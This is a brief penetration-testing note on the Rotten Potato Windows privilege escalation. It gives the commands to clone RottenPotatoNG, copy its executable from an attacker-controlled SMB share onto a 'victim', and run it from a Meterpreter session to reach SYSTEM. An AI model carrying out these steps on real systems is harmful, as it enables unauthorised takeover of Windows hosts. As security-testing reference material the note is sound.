Windows privilege escalation technique.
Must a Meterpreter payload be used as the listener?
- Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
- Potatoes – Windows Privilege Escalation
Use when winPEAS or "whoami /priv" reports that the account has "SeImpersonatePrivilege" or an equivalent privilege. This usually includes many Windows service accounts, such as the IIS and SQL Server accounts.
Download RottenPotatoNG
The code for RottenPotato is no longer maintained. Use the newer implementation, RottenPotatoNG, instead. See GitHub.
git clone https://github.com/breenmachine/RottenPotatoNG.git
Upload file to the victim
Use Impacket.
copy \\x.x.x.x\myshare\RottenPotatoNG\RottenPotatoEXE\x64\Release\MSFRottenPotato.exe C:\<some path on victim>\MSFRottenPotato.exe
Execute the exploit
After getting a Meterpreter shell with incognito mode loaded:
MSFRottenPotato.exe t c:\windows\temp\test.bat